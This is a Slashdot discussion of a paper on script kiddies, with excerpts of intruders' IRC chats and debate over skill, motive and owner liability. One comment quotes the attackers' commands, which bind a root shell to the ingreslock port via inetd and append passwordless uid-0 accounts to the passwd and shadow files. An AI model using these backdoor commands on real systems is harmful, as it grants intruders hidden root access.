Slashdot Mirror
Understanding Script Kiddies
Kzip sent us an interesting paper on script kiddies. It basically follows a log of a box being cracked and rooted, and then has tons of IRC logs with the responsible folks. A lot of insight into the mentality, but more important, the novice skill level required to do serious damage to many systems.
A few months ago I saw a step by step instruction set on how to exploit a machine with the BIND vulnerability, and I have to admit, I was tempted to try it, to see if it'd work. Moreso, I was kind of like "wow, I could do all these steps even though I'm dumb", and I know if I had there would have for sure been a little buzz of delight.
I used to buy beer with fake ID before I was of age, and it was the greatest, there was a total high when it worked. That is sort of script kiddy-like, it's not like I dud anything clever or anything, I just showed the clerk my ID and bought it, but it still felt wicked, and I think that's the thing in play here: It's easy to say "oh those kids don't know anything, what they're doing requires no thought" etc, and it's true (reading these transcripts makes you realize how incredibly dumb they are, it's really sad), but it is irrelevant, because as long as breaking into a box gives them a little buzz and feeling of accomplishment, they aren't going to stop.
p.s. the part where the guy is talking about how fat he is, that is so priceless and hilarious. If it wasn't so pathetic I'd laugh till I cried
sig:
See the "..for smart people" banners Wired runs here? Look elsewhere guys.
We've got something very similar in the UK as well, albeit that the Occupiers' Liability Acts rather negate the possible line of defence that the attractant wasn't visible from a lawful place.
Thing is, those occupiers' liability cases are more about the owner's liability where the kids get themselves hurt: what I want to get at is the owner's liability for what the kids do to others once they're in.
This, though, is probably a more useful analogy than my shot from the Rylands. v. Fletcher angle: rather than maintaining something dangerous, what we're looking at here is liability for something that attracts children of known propensity and capacity for damage. Since that risk is obvious, there ought to be liability for failure to take account of it? Discuss.
-- AndrewD
A Maze of Twisty Little Laws, All Different.
Although I'm hardly calling these guys UNIX experts, they're hardly "script kiddies".
/bin/ksh -c echo 'ingreslock stream tcp nowait root /bin/sh sh -i' >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob. /etc/passwd; /etc/passwd; /etc/shadow; /etc/shadow;
/etc/shadow and /etc/password memorized. Knowing UNIX as well as they do does take some time, knowlege, and ability.
A few of the commands they typed
echo "r:x:0:0:User:/:/sbin/sh" >>
echo "re:x:500:1000:daemon:/:/sbin/sh" >>
echo "r::10891::::::" >>
echo "re::6445::::::" >>
Looks to me as though they have all of the fields in
-Patrick
Hosting for Creators: http://rpg-works.net
Good points. On the other tentacle, what about the argument that script kiddies are like rats? A natural part of the web ecology, destructive and lacking in any moral sense (at least until they grow up, if they ever do)?
On that analysis their actions, being predictable consequences of poor security arising from creatures that are not moral agents, are something that the administrator of the compromised system should be responsible for preventing.
The argument about a scope-sighted rifle is a straw man. Nobody would expect someone to do that sort of thing to a domestic fuel supply; expecting the owner to guard against it is unreasonable. On the other hand, in a neighbourhood full of kids, it is reasonable to expect him to keep the thing locked up so the little buggers can't play with it. (Example from a real case: a bus depot didn't lock its gates at night, and had petrol lying about the place unsecured. Kids got in and began playing a game involving molotov cocktails, and dropping lit matches into buses' fuel tanks.)
Essentially, the argument is whether the risk of script kiddie attack is sufficiently foreseable that an owner ought to guard against it.
-- AndrewD
A Maze of Twisty Little Laws, All Different.
Use a fixed font, not variable width. Magazines are usually text, "l33t" instead of "elite" came out of ascii art. </trivia>
At a start, look at chldren in the US versus other countries. In france or other European countries a 5 year old kid can sit through a formal diner. How many 5 year olds in the US can do the same?
You really think five year old children are that much different, be they European, American, Indian, Japanese or whatever? Do you really think the notion of proper behavior (which varies with the different cultures) has sulked in by that age? Or did you just have a bad experience with your table neighbour's children yesterday night?
We have stopped teaching our children responsibility and discipline.
This is a favourite of conservatives, people who long for the "golden days" and suchlike fools. Responsability is a word much used by them, but seldom understood. You're aware that it is more easily taught by example than by indoctrination, right? And discipline is worth nothing if not rationally accepted, and pondered about. Otherwise it is no different than dog training.
It is much harder to aquire discipline later in life than early. Hell I am 22 and just now starting to learn to discipline myself. Its NOT easy. Its a skill that needs to be taught young.
There we go again with the discipline harangue. Discipline is highly overvalued. It is not always necessary, because it restrains leisure, imagination and all easy going things that make life worth living. Sometimes it is crucial, but only if you conscientiously accept it with your intellect. Perhaps you'll understand it when you're thirty.
All in all, the problems you seem to attribute to society's unwillingness to inflict responsibility and discipline on the young, are actually IMHO, the consequence of people not using rational thought enough in their lifes. Like: buying a cheaper product, even though its production endangers the environment or the local economy.
Information wants to be beer, or something like that.
This may work with a few kiddiez, but overall it is a bad idea. You are not going to have a meaningful conversation with someone who just wants to screw with your box, and you could end up making yourself a target. The best defense is just to keep your machines as secure as possible. What's more inviting to some fourteen year-old wannabe, a mostly secure box where intrusions are efficiently detected and patched up, or one in which the admins drop in to say "hi?"
Stopping to chat just turns breaking&entering into more of a game than it already is. This is exciting for the kid, and a pain in the ass for you. For stopping everything from serious crackers all the way down to little kidz, the best policy is no retaliation, no dialogue of any kind.
--
share and enjoy
One year ago I would have told you you were full of shit.
Now I sit here, married to a beatiful, smart, funny gal that happens to think I'm just the coolest dude. And she is fully aware that I'm a geek. She met me when I worked on her computer for her (at work) and spends a lot of time avoiding my "home office" (a room with 8 computers in it). I think girls don't like geeks when they are young and idiotic (just like guys go through that young and idiotic stage), but once they mature they realize that those guys that were such geeks in school are pulling in some serious cash, and actually are quite responsible.
Food for thought for any teen-age girls in the audience.
Bite my yammer.
And how much does it cost to hire a competent sysadmin?
Taking your definition of "hacker" as accurate (to save time), you are quite correct. However, they describe themselves as "elite" (or however you want to write that using numbers) hackers, which they certainly aren't.
fun replying to myself, but there is some seriously solid witty banter in there.
:i want some one with good writing skillz ::/ :to write About, FAQ :etc
:is this para write for About :? :K1dd13 came into existance almost a year ago. It was born out of hate and contempt for violence, atrocities and human rights violations against Muslims, specially the affectees in Kashmir. It was precipitated to bring the attention of world leaders and :? :organizations to the issue in cyberspace which is today the leading source of communication. :is that fair enuff? :eyah I guess :I thought it was like a hacking group
:what is lahore ? :lahore==city :Sp07 give me a good quote :I thought it was the whore in french :ill go get a quote fo you :heh :ok :I dont know any in my ehad :hea :d :Silence is gold, if nothing better you hold. :tahts gay :I heard a quote before :goes something like "If you want peace, you must prepare for war" :I herad it in a simpsons episode
:im a pothead :hehe :oh :what does it mean btw :P :? :someone who smokes lots of weed :hahaha :pot-heads :pot = weed :oh :i get tons f weed :but :i dont do it :heh :not weed in your garden or anything
:how much do you weight? :for real :300 punds :for real? :yes :you serious? :for real :yep ::) :serious :dont lie :hehe :i`m FAT :300 is a lot :as :s ::) :nope i`m 300#$@ :how old are you? :17
:dude :4 years back :H M :H M :i was 400 :and then i lost 200 :DAYUMMMMMMMMM :you liar :nutriotion :and then :how can you be 400 pounds when your 13? :I WAS :you liar :tendency :and :lots of eating :but then i left the diet and excersise :but i`ll loose it again :i`m serious now ::) :400 is too much for a 13 year old :when i`m serious imake sure to achieve the goal :maybe like 200 is cool :but 400 :no way :hahahaha :200 is still fat but 400 is like a fucking elephant
:smoking marjuana is likee 'cool'? :I GUESS :ITS FUN :oh :ITS NOT LIKE SMOKING :it tastes good?
:IT TAKES ME TO MY OWN WORLD :MWUHAHAHAHAHA :Ok i disclose my self. :I`m a FED :?? :OH SHIT :You are busted :FUCK YOU :DIE MOTHER FUCKER :FOR REAL???? :officer :yes. :suck my dick :dude :relax :no wonder :how would a pakistanian know english :its all clear :hey :hehe :your not really a fed right?? :y0 :? :dont even joke like that :nope :ok :MAKES ME FEEL NERVOUS :i`m not a fed :why did u take it so serious? :I DUNNO
:man dont think i`m a fed ::) :i`m a elite hacker
[ Dick admits he isn't top of the class at creative writing.]
:D1ck
:D1ck
:D1ck
:D1ck
[Here we have a fancy debate on the mission statement. These guys take themselves a tad too seriously.]
:D1ck
:D1ck
:D1ck
:Sp07
:D1ck
:D1ck
:Sp07
:Sp07
[ Our l33t h4x0rs look for profound quotes to adorn their web site]
:Sp07
:D1ck
:D1ck
:Sp07
:Sp07
:D1ck
:D1ck
:Sp07
:Sp07
:Sp07
:Sp07
:Sp07
:Sp07
:Sp07
:Sp07
[Dick doesn't know what pot is, but tries to look l33t by claiming he has lots of it. Rather Clintonesque admission follows. Spo7 isn't impressed].
:Sp07
:Sp07
:D1ck
:D1ck
:D1ck
:Sp07
:Sp07
:Sp07
:Sp07
:D1ck
:D1ck
:D1ck
:D1ck
:Sp07
:Sp07
[Spo7 expresses skepticism about Dick's impressive fluctuations in mass. He tries to get to the bottom of it. Suspenseful stuff, this.]
:Sp07
:D1ck
:D1ck
:Sp07
:D1ck
:Sp07
:D1ck
:D1ck :
:D1ck
:D1ck
:D1ck
:Sp07
:Sp07
:D1ck
:Sp07
:D1ck
:D1ck
:D1ck
:D1ck
:Sp07
:D1ck
:D1ck
:D1ck
:Sp07
:Sp07
:D1ck
:D1ck
:Sp07
:Sp07
:D1ck
:D1ck
:Sp07
:D1ck
:Sp07
:D1ck
:D1ck
:D1ck
:D1ck
:D1ck
:D1ck
:D1ck
:Sp07
:D1ck
:Sp07
:Sp07
:Sp07
:D1ck
:Sp07
[Dick has forgotten he has said he smokes weed. A rare occasion when he admits not knowing something follows...]
:D1ck
:Sp07
:Sp07
:D1ck
:Sp07
:D1ck
[Dick, ever the crafty one, shocks Spo7 with a clever deceptive move. Spo7 almost has a heart attack, but dick clarifies the situation.]
:Sp07
:Sp07
:D1ck
:D1ck
:Sp07
:Sp07
:D1ck
:Sp07
:Sp07
:Sp07
:Sp07
:D1ck
:Sp07
:D1ck
:D1ck
:Sp07
:Sp07
:Sp07
:Sp07
:D1ck
:Sp07
:D1ck
:D1ck
:Sp07
:D1ck
:D1ck
:Sp07
:D1ck
:D1ck
:Sp07
:D1ck
:D1ck
:D1ck
While I agree with a lot of what you say, I think your analogy is a bit flawed.
When a script kiddie breaks into your system could it not also be like someone entering your house (or business) through an open door and using all the tools (the phone, for instance) in your house to call up old ladies and defraud them of their life savings? Open door or not, in most common law countries, entering someone's house without permission to commit a crime is still break and enter (and at the very least trespass). Does that mean that people who left the door open are liable for having their home burglarized? What if the door was not open, just unlocked? Or locked but the key hidden under the mat? See what I mean.
In a real court of law, I suspect Bert would be seen as a victim as well and thus not held liable. Al maybe liable if he told Bert that the box was secure when in fact it wasn't (to follow my analogy, the lock company that installed a defective deadbolt could probably get sued). And I don't think there is any legal ground for holding me even partly responsible if a third party uses my property (phone, car, what ever) to commit a crime. In my above example, I could not be held liable even in civil court for the losses of the bilked old ladies.
The "law" probably won't work in this case.
That's not to say that that security isn't every sysadmin's responisiblity. But if I leave my door open I shouldn't be surprised if I'm burglarized.
And my niegbours won't talk to me or do business with me if they get affected by it.
Never by hatred has hatred been appeased, only by kindness - the Buddha
Does any one have a Script Kiddies to english translator?
But that was exactly the same strategy employed with passenger pigeons, and look what happened to that once "infinite" supply. I'm arguing we should take a more conservationalist approach. Do you really want our children to ask us, some day, "Were there really script kiddies?" Do we really want only to respond "Yes, Virginia. When the earth was younger and times were simpler, there roved children not much older than you, who could bring down entire corporations with the click of a button running a script that someone more intelligent than they had written and which they couldn't write for themselves if their lives depended on it." Will we be satisfied to take our children to the museum and show them the stuffed "last living script kiddy" in a realistic but still fake diorama of cheap porn and unfinished highschool English assignments? Will we?
"If one is really a superior person, the fact is likely to leak out without too much assistance" -- John Andrew Holmes
:J4n3! :.Filesystem 1k-blocks Used Available Use% Mounted on
:J4n3! :./dev/hda8 1935132 878956 957780 48% /
:J4n3! :./dev/hda7 23302 2650 19449 12% /boot
:J4n3! :./dev/hda1 2064032 1230496 833536 60% /mnt
:D1ck! :oki
:D1ck! :mkdir /win; mount -t vfat /dev/hda2 /win
:D1ck! :wait, what is /dev/hda7
:D1ck! :?
:J4n3! :linux swap partition
:D1ck! :ok
How sad is that..
As you can see from the article, the crackers knew little about the underlying OS and the stolen subscriber list (this may be from another article) was the only important data that was compromised. The mentality seems to be that of the hunt--in all but one of the cases, the cracker only wanted to get root access to *a* system--they did not care about how that system was used. As a result, they could do nothing more than say "I got in" or destroy files (and especially sensitive files will be backed up). They do not take the time to study the machine they break into because they really do not care--their callous indifference prevents them from utilizing their access to steal proprietary information. In addition, they are motivated by boredom and a desire to prove themselves, not financial gain.
By far, the most debilitating aspect of the script kiddies is that they are unorganized and unfunded. It is the difference between an army and a group of thugs--as long as there is little collaboration (not that many of them possess significant knowledge or ability), then chaos reigns and isolated cases or damage are more common than coordinated assaults on vital systems. Right now, it is a game of craps--if they happen to hit an important system, it is not through any planning on their part. The danger comes when specific, critical systems are targetted.
Script Kiddies pose little threat because they are easily deterred. If the sysadmin installs all of the latest patches and is diligent about dealing with known issues, then the script kiddies "favorite utils" will not work. Since they have no need to crack *that particular system,* they will move on. It is just like when a common thief sees that a house is protected by a burglar alarm, he will just move on in favor of more vulnerable targets. In the case of script kiddies, they do not possess the knowledge to crack a well-protected system even if they tried, so the threat is further reduced.
In a worst case scenario, script kiddies manage to delete all files on the main file server. The organization may experience 1-2 days of downtime and a few $100,000s - $1,000,000s in lost productivity. Eventually, the system will be restored and the people will return to work. Now, imagine that there is a coordinated assault against *your* server. You are a publicly traded company that is scheduled to report its quarterly earnings in a week; suddenly, hackers enter your system and seem to just delete all of your files. Almost immediately, your shares lose 1/3 of their value as one of your largest institutional shareholders sells its entire holdings in "anticipation" of your earnings report. Executives lose lots of money and you may be subject to an SEC investigation and shareholder lawsuits alleging insider trading. Which is more of a threat to your organizations long-term stability?
ByteMyCode.com: A Web 2.0 code sharing community.
It's an interesting idea, and it would encourage security, but it would only stand up in court for about 4-5 nanoseconds.
:)
Generally, vicitimizing the victim by making him pay would be looked down upon. How about this? I break into your house, paw through your laundry, eat your food, and then leave without damaging anything. Should you be required to pay me for your lack of security?
Granted computers are different since you can launch attacks on other people from compromised computers, and you can't do that from houses. But the point is that making victims pay because they were victimized is going to piss off a LOT of people.
-- Truth goes out the door when rumor comes innuendo. -- Groucho Marx
> Then again, could it be that society implicity
> tells boys that they need to be "macho and
> manly"? Sort of how society tells girls they
> need to be "skinny and beautiful"?
I think its more than that. People always want to blame drug abuse, violence, etc as "the problems" when really, I think they are symptomes of larger, and more fundamental, problems with our societies social structures...specifically they are rotting.
At a start, look at chldren in the US versus other countries. In france or other European countries a 5 year old kid can sit through a formal diner. How many 5 year olds in the US can do the same?
We have stopped teaching our children responsibility and discipline. In fact, we have taught them that they can be irresponsible...its expected of them.
Now as for firearms...they ARE a buzz enhancer in a way. I have used them...holding a gun is a high in and of itself. The realization that YOU now can decided life or death at a whim. Its power.
Does that make them bad? No. It, like anything, is something a person must be taught to control. I have cousins who have owned firearms since they were 11. They are some of the safest people I know with guns. They were taught the simple rules from extremely early ages.
You NEVER point a gun unless you intend to fire it. You NEVER point a gun at a person unless your life is in danger. You ALWAYS treat every gun as if its loaded (even if you have the firing pin in your pocket!). Its all about respect for the power of the tool and for basic life.
It is much harder to aquire discipline later in life than early. Hell I am 22 and just now starting to learn to discipline myself. Its NOT easy. Its a skill that needs to be taught young.
All in all I don't think our society breeds healthy life attitudes. Its a much harder problem to solve than just being reactionary and trying to solve the symptomes (like prohibition of drugs, drunk driving penalties, etc etc) but raising responsible people with healthy life attitudes will solve these at the source.
System cracking is just an extension of adolencent irresponsibility. It is not the problem but the symptom. Catching crackers will no more solve the problem than taking tylanol will get you over your cold faster. (all it does is make you feel better by treating symptoms)
"I opened my eyes, and everything went dark again"
Try Debian.
:)
Debian rarely gets broken into, for one reason: the ease at which you can keep packages updated. If a security exploit is found, you'll generally see an updated package appear within a day or less. In fact, I'm on bugtraq, and I often get the updated package a few hours before the announcement is even out.
How do you get this package, you ask? Well, once or twice a day, run two simple commands. It looks a bit like this:
[root@host] > apt-get update
[root@host] > apt-get upgrade
Anyways, its quick, easy, and works. If you keep up to date [which is REALLY easy], your chance of getting broken into is pretty damn low. Sure, it will never been 100% secure, but its closer than most other distros.
I used to use Slackware. After a few years of it, I got tired of not having package management, so I switched to Red Hat. After a while, I got tired of searching down packages through rpmfind, and switched to Debian. I haven't looked back since
-[Blaine]- "'Oh dear,' says God, 'I hadn't thought of that,' and promptly vanishes in a puff of logic."
Seriously, these kids will spend almost all the time they're not exploiting playing starcraft.
And be sure he isn't running sash.
Hamish
"Wise men talk because they have something to say; fools, because they have to say something" - Plato
So they go around telling their friends "I'm a hax0r! b0w!"
It's about image. They think they can prove themselves to their peers by cracking a box with a canned program. Exploration has nothing to do with it. If they wanted to explore, they would write the programs themselves. But instead, they take the lazy way out, and run a pre-made program.
Laziness and Exploration do NOT go hand in hand.
-- Give him Head? Be a Beacon?
-- Give him Head? Be a Beacon? :P)
(If you can't figure out how to E-Mail me, Don't.
get it here.
Looks to me like they got that from somewhere else. They don't actually have those fields memorized, and probly couldn't tell you a damn thing about what those funny greater than signs are doing in that text.
just testing something '
Why do users with IDs under 100,000 or over 700,000 usually have the most worthwhile comments?
It's also possible that they just memorized the strings themselves or merely copied them from their rootkit documentation.
--
* Q
P.S. If you don't get this note, let me know and I'll write you another.
How does the fact that some administrators are lazy and unfit for their jobs make me wrong?
If you are a competent admin, Debian can be a great tool. It simplifies the process of keeping your system up to date with the latest security patches.
More often than not, the weak link in the chain is the administrator. Human error and laziness is more likely to get your system broken into than anything else. However, if you are diligent about it, you greatly reduce the risk of breakins. Debian helps out a lot with this, and makes it easier.
People who deploy systems and then forget about them are the worst type of administrator, for when you assume that you are infallible, you set yourself up to be shown how wrong you really are.
-[Blaine]- "'Oh dear,' says God, 'I hadn't thought of that,' and promptly vanishes in a puff of logic."
i think it's like if you have ants. you can kill the ones you see, but there's always more hiding, all wanting to do the same thing. if you have time/money you can even try and track them down, but you never get all of them, there's always a few left.
"Leave the gun, take the canoli."
this is just a placeholder till i send back my real sig from the future.
OTOH. Leo is doing allright and I do get sufficient amount of sleep. Please spreading FUD Michael.
Thanks for the reply. While on the train last evening, I realized you were pursuing the other angle of owner's liability for a trespasser using the property for dangerous or illegal activity. I do not know of a case directly on that point; however, two torts theories come to mind. First is the "inherently dangerous" property doctrine. If an object is inherently dangerous, a property owner cannot use the community standard defense that allows them to only take the precautions that similarly situated businesses have taken. We could advocate that an unsecured computer is a potential weapon that could be used to cause massive disruptions of the economy through DDoS attacks. This would remove any defense of an owner claiming the cost of having a team of security analysts constantly monitoring their systems. Unfortunately, most applications of this doctrine generally involve risks to human life (e.g. firearms, explosive and combustable materials) and not economic hazards. Moreover, I have not seen this applied to anyone whose relationship to the material was not lawful (re: purchaser, licensee, or guest). If this doctrine could not be used, I would assume that you could make the full tort arguments. But for the unsecured computer, a DDos attack would not have been made. The negligence in security is also a reasonable proximate cause to the DDoS attack. A system admin knows or should know that script kiddies will usurp a non-secure system and use it for destructive purposes. Moreover, in our hypothetical fact pattern of the honey pot configured systems, its not costly or unduely difficult for the sysadmin to apply patches released to the general public. I am not sure this line has worked well in the US courts. A number of complaints have been directed at gun manufacturers trying to use the same arguments. While there cases may not be as similar, (i.e. this would be more analagous to suing Sun than XYZ company) there arguments are falling along the same lines. IMHO, it would be a difficult cause of action to sustain b/c of the political climate. There are heavy movements of: (1) try kids as adults (2) hackers are bad If I were defending this cause, I would definately demand a jury trial. Since the venue would be in my home area, I imagine I would get more sympathy as an employer and contributor to the economy than "those delinquent kids." If a jury did partition any liability my way it would be a small percentage. (Assuming its not a joint and several liability jurisdiction which are now a minority in most US States). I might change this strategy if a bigger contributor to the local economy was hit with a DDoS attack. They may receive enough sympathy to go after the corporate deep pockets. I do agree with your last statement, the risk is obvious and a non-biases trier of fact may grab on this concept. btw- IANAL, but a 3L law school student.
THANKS AGAIN SLASHDOT. GEEEZ.
sig:
See the "..for smart people" banners Wired runs here? Look elsewhere guys.
> You really think five year old children are that
> much different, be they European, American,
> Indian, Japanese or whatever?
In some ways. by 5 years old children are much more developed mentally than most people give them credit for. They are certainly capable of learning to sit still through a diner by that age.
> Do you really think the notion of proper
> behavior (which varies with the different
> cultures) has sulked in by that age?
Only partially. The beginings of moral development are in place around 7. (there is an old saying "give me a 7 year old boy, and ill give you a man" or some similar confuguration of words) In fact the whole concept of "childhood" is relativly new (few hundred years old...maybe as many as 500).
Certainly by age 5 they are able to learn more than they are taught.
> This is a favourite of conservatives, people who
> long for the "golden days" and suchlike fools.
I tend to agree. I also tend to think that no such "golden days" ever existed. Every era has had its problems.
However, change does happen. Culture changes, society changes. Just because "conservatives" often argue something, doesn't make it wrong (just because they are often very wrong). I believe that people are less disciplined today, in our culture, then they have been in the past. I think our society ENCOURAGES this.
> ou're aware that it is more easily taught by
> example than by indoctrination, right?
Actually indoctrination can work wonders in the right setting...but yes example is how children learn. Many adults arn't much better than their children.
> There we go again with the discipline harangue.
> Discipline is highly overvalued. It is not
> always necessary
Perhaps you miss what I mean by discipline. Discipline is internal. It is the ability to consiously make a decision and stick with it. The ability to supress desire when needed. Control over ones own mind. The ability to say "Ok I have to do this" and go do it.
Take meditiation. It is the ULTIMATE form of discipline. The ability to sit down quietly and just sit there for even 5 mins without stiring, without looking around and doing physical things. To be able to say "I am going to just sit here in an upright position with my eyes closed for at least 5 mins" and then to actually do it....that is discipine. (and yes I realize there is more to meditation than that)
> re actually IMHO, the consequence of people not
> using rational thought enough in their lifes.
I definitly agree. Rational thought is important. It is a discipline! Its is about controling oneself. Supressing emotional desires and bias and using rational thought to solve a problem and make a decision.
> Like: buying a cheaper product, even though its
> production endangers the environment or the
> local economy.
Well no. "cheaper" may be a necessity. How about buying the flashy SUV even though its use endangers the environment, worldwide oil supply and 99% of your driving is JUST you back and forth to work with no cargo.
Look at the car commercials. They play on emotions. Like the recent "Dodge" adds where they constantly mix the words "Dodge" and "Different" to try to connect the two. This advertising has nothing to do with trying to get you to make a rational decision.
"I opened my eyes, and everything went dark again"
Roughly what I was thinking when I drew the Rylands v. Fletcher analogy (and you can tell the practitioner from the student here, can't you? I never cite a damned thing and you're still boned up with authorities for the exams).
Yes, the authorities on dangerous property all involve risks of physical damage. Put the DoS business before a judge and he's going to be acutely conscious that he's striking out for as-yet uncharted waters.
I'm after an approach to the problem that passes the "sniff test": that is, if I plead this in a case, would I, on taking someone like (say) Master Turner at the Royal Courts of Justice through that pleading at a case management hearing, hear, about halfway through my carefully-honed advocacy, that little judicial sniff that says more eloquently than any words could "I don't fancy your chances at trial with this, Mr. Dennis".
And, this being the UK, we don't have juries in civil trials. (In theory we can, but no-one's bothered since about 1935). And, if your jargon means what I think it means, the UK is a "joint and several liability" state. That is, liability between joint defendants as joint tortfeasors is joint and several and contribution is settled in proceedings to which the claimant isn't party - he can enforce against either for the full amount of the judgment.
What's a 3L Law Student? That is, I know what a Law Student is (I was one once) but what does 3L mean?
-- AndrewD
A Maze of Twisty Little Laws, All Different.
ADMROCKS? I didn't know we were hosting that domain name...
;)
-Waldo
The ;s are actually there to make it work even if you do not have a correct terminal.
No, I meant that viruses would be designed to compromise an individual company's security and they would not have the expertise on hand to combat it. Securing a system against script kiddies is as easy as ensuring that you have all of the latest system patches installed, as their "rootkits" usually come out after the issue is reported, and have no major holes.
Securing your system against a coordinated attack means having *real humans* constantly monitor system usage to look for suspicious usage patterns. In addition, it should be ready to divert a team of developers from their core business to immediately respond to any potential threats. Merely securing the system after the fact (like filtering out VBS extensions *after* being hit by "ILOVEYOU," as so many sysadmins did), is not sufficient as vital information is vulnerable as soon as the system is penetrated, and is easily accessible if the crackers are prepared and know where to look.
Most organizations do not encrypt internal documents, regardless of their importance; those that do probably have many users with their encryption string the same as their network password! Without adequate ssafeguards protecting information from being compromised even if the cracker has root access, the possibility of espionage exists.
ByteMyCode.com: A Web 2.0 code sharing community.
I own a server on the Internet which basically serves my hobby stuff. Being a busy guy, I simply don't have time to deal with the various patches and such that I should be getting.
Jon Katz talks a lot about big corporations taking over the Internet and obliverating the little guys. Well, I'm a little guy who has a server with information on it of various types that many folks find useful.
When someone attacks the big companies, they have resources to deal with it.
When someone attacks my server, I'm effectively helpless - and that's pretty much burned me out on creating useful stuff and putting it there.
It seems to me that script kiddies are much more of a threat to "the little guy" than the big corporations that Katz fears. The corporations can't knock us offline, while a script kiddie killed off my server for a solid month.
I wish there was a way to convey to these people how much misery and anguish they cause on the other side, especially for servers run by individuals who really don't have any good options for protection.
I've read in this thread stuff like "script kiddies help the ecology of the net by eliminating clueless sysadmins". But what's so bad about being a clueless sysadmin? If I have something to share with the world, and can afford a server to share it with, well, surely I should be able to do it. Why should I have to spend hours of my time trying to keep up with nonsense like this?
To me, there's nothing more vile and contemptable than a script kiddie. Except, perhaps, the people who publish exploits for them to use.
Why on earth would someone do something like that?
D
----
Who better to conserve this resource than businessmen like myself who rely on the supply of script kiddies for our livelihood?
The real threat of script kiddie extinction comes from those who consider them worthless pests, and would undertake campaigns of wholesale extermination. We, on the other hand, consider ourselves the stewards of this tasty natural resource.
Yes, 31337 |\/|337 Enterprises is environmentally friendly. We run a script kiddie breed and release program based on artificial insemination (even under ideal breeding conditions, the poor creatures seem to lack the basic instincts for reproduction, but gathering the necessary samples has never been a problem).
(Okay, so we just spam AOL accounts with links to |-|/\X0R1N@ +001Z sites, but the end result is the same; would you want to handle script kiddie genetic material?)
... That is pretty deep stuff. I have to agree with you about the feeling of power. In the past, we've had management that went about acting like blowhards all day long, excercising their power. Very little actually got done when these people were in control. They spent all day in mandatory meetings they had called, and the like. People who are actually getting stuff done don't have to "toot their horn" every step of the way -- others do it for them.
--
NeoMail - Webmail that doesn't suck... as much.
The funny part for me was seeing people who actually TALKED like that, I was like oh no people really talk like that. Please.. Make it stop :P
What is a script kiddie ? Leave alone discussions of him ..Does he become a expert hacker some day.Ok in the transcripts they learnt something.How to mount ..see disk space.Over the years they may mature and write exploit scripts.Is n't this possible? .Well a script kiddie doesn't know why he should like a dumb computer .It's this hate and the jealousy of other people
being intelligent or not , despicable or not.What is the future of
a script kiddie
Well for me how a script kiddie differs from an expert hacker (or whatever we may choose to call him ) is education.Education is not about
knowing how to do a thing or even about finding innovative ways to hack.It's about how you percieve the beauty of a thing.
It's when you start loving a computer , loving an OS , loving a home page and knowing well why you love it
liking a thing for reasons unknown to hime he seeks to destroy.
Well, it may surprise you to learn that the level of violent crimes in schools has been decreasing in spite of the news coverage. News organizations rarely go find crime statistics, they just report on how common reports are. According to the FBI, crime has been decreasing in all categories every year since 1995 (the last year on the 1999 preliminary Uniform Crime Report). A lot of the measures being taken in schools are hysterical reactions to reported events without any real effort to determine the real risks. Bolie IV
It's a quick buzz. It makes them feel knowledgeable and powerful with little need for ability, knowledge, or a significant time investment. Low learning curve, and they get to show off their 1337 sk1lls to their girlfriends, or to someone else's girlfriend for that matter.
Eh...
It is a (somewhat) more intellectual version of beating up people in the street.
I tried very hard once to convince some script kiddies to put their talent where it would do some good. At the time I was an IRC Operator and had occassion to chat with the kids often. Unfortunately they could think of nothing else except making our lives on IRC as miserable as possible; biting the hand that feeds them, essentially, by performing never-ending DoS attacks on the IRC network. No amount of complaining to ISPs would do much good--they had so many rooted boxes it was impossible to provide any compelling evidence.
One day I heard chat of some of the kids bragging about hacking into NASA. NASA, as many of us know, might as well be considered a honeypot network built solely to test script kiddies' abilities. They compromised a web server at the Goddard Space Flight Center and replaced its web content with yet another Mitnick release demand. (note: no offense intended to administrators at NASA. I suppose they have a huge burden maintaining such a large network of UNIX machines. Dunno).
On the web page they put up were IRC nicknames I recognized. I thought for some time and concluded some of the kids needed a tough lesson, and now was the time for them to learn it while they were still minors. So, I contacted NASA. To make a long story short, I assisted them in gathering enough evidence for them to investigate. Keep in mind that I did all this while connected to IRC as a plain ol' user, never using oper commands. It wasn't tough; the idiots bragged and lambasted NASA in their public IRC channel!
Since the main suspect was a minor, I wasn't told what punishment was eventually handed down, nor his real name, of course. I do know his computer was confiscated for a period of time. He knew it was me that ratted him out, and he asked me why. I really don't think I was successful in convincing him that I didn't have any anymosity toward him personally, but that I merely believed his actions, both personally witnessed by me and many others, and what I knew of his exploits, I found appaling.
So, would he have eventually grown out of it like the script-kiddie mentioned in the post I quoted? Or, would he have continued to hack and hack until finally someone caught him after he turned 18? All I knew was that he was a menace to NASA and to our IRC network, but I truly hope he has squared himself away. I felt a tiny bit sorry for the kid at the time, having never had any desire to rat anybody out, but I don't feel that way any longer.
I wonder if that kid reads /. Heh.. probably!
Hopefully I didn't put any [] around my words.
I don't think he was advocating keeping the holes secret. The problem is, people who wouldn't have a clue how to use any of the exploits based on the technical information itself, can download scripts written by people who do know what they are doing. As much as I am for openness, perhaps not distributing "h4x0r1ng for idiots" script kits wouldn't be the worst idea in the world.
Doesn't understanding Script Kiddies imply that they do what they do with some logical, understandable purpose?
-- Truth goes out the door when rumor comes innuendo. -- Groucho Marx
Prejudices are inane, but generalizations truely are the highest form of thinking. In this case its really not too much of a stretch. Its definitional. A script kiddie is, by definition, someone who uses other people's scripts, which they usually do not understand, to do damage to systems. True, some do understand them. But to defend against an attack by them, you need to understand some fundamentals about the vast majority of them, such as their lack of knowledge.
haha it trimmed out all of the Nick entries cause of the !!
What are they supposed to learn from their mistakes, pray? How to make a knife from a spoon, to hide it from guards, to stab people with it and not get caught? How to join a gang, make a tattoo gun from a ballpoint pen and a walkman, and intimidate the rest of the cell block?
Great...
What is the robbing of a bank, compared to the founding of a bank? -- Bertolt Brecht
D0000D! They read that off a website or something, it didn't look to me that they had a very good knowledge of what they were actually doing from their conversation. They didn't even seem to cover their asses very well.
Eh...
Why are there so many young kids being so destructive? I remember when the "big" hackers of the 80's were quite polite with thier abuse of other computers. But why are these kids so violent?
My opinion is that thier parents never taught them respect or to value anything. I don't think they even concider the effect their DOS attacks can cause to other people besides just the one they are attacking. An attack on a web site that is being hosted with others effects all the sites hosted there.
What I'd like to know is why the programmers creating these scripts don't keep them to themselves...
If ignorance is bliss, the world is full of blissful people
> Most of them couldn't even tell you what ls -al does, let alone truly explain how to crack a password file.
Yeah, if they had any initiative they'd get a copy of K1dd13 5cr1p75 f0r Dumm135 and bone up on these things.
--
Sheesh, evil *and* a jerk. -- Jade
